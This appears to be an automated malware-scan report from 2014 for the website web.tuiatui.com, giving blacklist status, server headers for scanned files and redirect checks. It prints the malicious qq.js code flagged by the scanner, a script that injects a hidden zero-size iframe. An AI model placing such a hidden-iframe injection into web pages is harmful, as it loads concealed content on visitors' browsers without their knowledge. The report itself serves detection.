Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=web.tuiatui.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web.tuiatui.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://web.tuiatui.com/content/ | HTTP/1.1 200 OK Cache-Control: private Date: Tue, 15 Apr 2014 18:21:58 GMT Server: IIS Content-Length: 7561 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=ej4fgrvk2mdnd5hr2s4dvsfq; path=/; HttpOnly Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ X-AspNet-Version: 0 X-Powered-By: WAF/2.0 | clean |
http://web.tuiatui.com/ | 200 OK Content-Length: 131830 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: chenfatan.tuiatui.com ...[47006 bytes skipped]... -f606-4466-a1ab-5bd206532ee4.jpg" style="display: inline; " width="279" height="279"></a></div><div class="middle-money" style="display:none;" >å«æ¨å¹¿ä½£éï¼ï¿¥12.8</div></div><div class="show1_txt"><ul><li><a href="shop/ProductDetail_2597.html" title="ç·ç èæ¯å¢">ç·ç èæ¯å¢</a></li><li class="show-item"><a style="color: #ff5500;" href="http://chenfatan.tuiatui.com/shop/" >港å</a></li></ul><a href="shop/ProductDetail_2597.html"><div class="show1_txt_con"><div class="show1_jiage"><em><span style="color:#fff;padding:0px;"><font>ï¿¥</font>128</span><p>ééï¼0</p></em></div></div></a></div></div></div> </td><td> <div class="show" onmouseover="javascript:{this.className=& ...[108770 bytes skipped]... | ||
http://www.tuiatui.cn/index.php/Tj/index?jsuid=134 | 200 OK Content-Length: 5014 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/content/js/jquery-top.js | HTTP/1.1 200 OK Cache-Control: private Date: Tue, 15 Apr 2014 18:22:04 GMT Server: IIS Content-Length: 7592 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=elxrf5kn4mbx4lw0ssepafs2; path=/; HttpOnly Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ X-AspNet-Version: 0 X-Powered-By: WAF/2.0 | clean |
http://web.tuiatui.com/test404page.js | HTTP/1.1 200 OK Cache-Control: private Date: Tue, 15 Apr 2014 18:22:05 GMT Server: IIS Content-Length: 7579 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=pq0qizthgahh30ead0edruvp; path=/; HttpOnly Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ X-AspNet-Version: 0 X-Powered-By: WAF/2.0 | clean |
http://web.tuiatui.com/content/inputSuggest_0.1.js | HTTP/1.1 200 OK Cache-Control: private Date: Tue, 15 Apr 2014 18:22:06 GMT Server: IIS Content-Length: 7599 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=bzuyoecklz5iualkz1gkfmrd; path=/; HttpOnly Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/ X-AspNet-Version: 0 X-Powered-By: WAF/2.0 | clean |
http://web.tuiatui.com/WebResource.axd?d=9AHjoez9BzNKZrgEUhFr30DL5EVNYXIgMAzox9N_jDSI_azkloFZBQB0zjW44EH5xPZsyPxN1DdWaEL0ugPHI-VLpt71HoRjNy-XKAe8PO41&t=634773918900000000 | 200 OK Content-Length: 22346 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/ScriptResource.axd?d=FOuwedjHdZwmdycCJ8okv848dCL630rXwCkIoGO0L2lsP5HMd-r2MkNNjAq8UZ8FuJ89bOrVckmpawbGrkNVpPQcWakWMX3gFsTfrfP8QmaRIBc_NhCHKwDlH3BYGubhFUvqqpz9cLXYYZfys__yNV_SwPxKcpWMjoAWmsA9LfI1&t=2f7a99f5 | 200 OK Content-Length: 26951 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/ScriptResource.axd?d=fFnB4J-GM-_Szd2FfELfzU51ZsX6036lIEZnUL2mS_69pMWRb2eHHAkf4T8QlRlOo604aOCHmcFixq1XREl_VOimjcORQh-tPIBRRMdWYZ_KwfASW6Ngk43kHjQQpEeJSAaLQAJEpIn58U0zIy2_nxiUK1YMCuAE5vGOTBJvMRMIKf20OnHYLQowaORncPbr0&t=6119e399 | 200 OK Content-Length: 300883 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/ScriptResource.axd?d=1iYv556PDjTj9kalH-_ZPh_ENSV-GyolY9eLiyWmIW7J8SBWBzwXslB-h7gW0pzgXORZIhXip3qTzQ9TP-PO2GZfHB8UnsGUXiOeX108hrMOFhCZb65SD_mlp7aqF83S9qAtdySrH9TtzYKKWaHsmkrex-bBVgIy6nt9NuqdC6TdthxYmKRXl6UsjlVaYQ4_0&t=6119e399 | 200 OK Content-Length: 101392 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/content/../imgd/swfobject.js | 200 OK Content-Length: 10223 Content-Type: application/x-javascript | clean |
http://web.tuiatui.com/qq.js | 200 OK Content-Length: 179 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var randomnumber=Math.floor(Math.random()*100000); document.write('<iframe src="http://'+location.hostname+'/dy/get.aspx?random='+randomnumber+'" width=0 height=0></iframe>'); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http:// <iframe src="http://'+location.hostname+'/dy/get.aspx?random='+randomnumber+'" width=0 height=0> | ||
http://api.pop800.com/800.js?n=105727&s=06-14&p=r&l=cn | 200 OK Content-Length: 41055 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: web.tuiatui.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 15 Apr 2014 18:21:59 GMT
Server: IIS
Content-Length: 131830
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=fe5irzzfew2045yhcee4a032; path=/; HttpOnly
Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/
Set-Cookie: dayfirst=advid=2642; expires=Tue, 15-Apr-2014 23:22:00 GMT; path=/
Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/
Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/
X-AspNet-Version: 0
X-Powered-By: WAF/2.0
...131830 bytes of data.
GET / HTTP/1.1
Host: web.tuiatui.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 15 Apr 2014 18:21:59 GMT
Server: IIS
Content-Length: 131830
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=fe5irzzfew2045yhcee4a032; path=/; HttpOnly
Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/
Set-Cookie: dayfirst=advid=2642; expires=Tue, 15-Apr-2014 23:22:00 GMT; path=/
Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/
Set-Cookie: cya_city=city=%e6%b7%b1%e5%9c%b3%e5%b8%82&cityid=291; path=/
X-AspNet-Version: 0
X-Powered-By: WAF/2.0
...131830 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: web.tuiatui.com
Referer: http://www.google.com/search?q=web.tuiatui.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: web.tuiatui.com
Referer: http://www.google.com/search?q=web.tuiatui.com
Result:
The result is similar to the first query. There are no suspicious redirects found.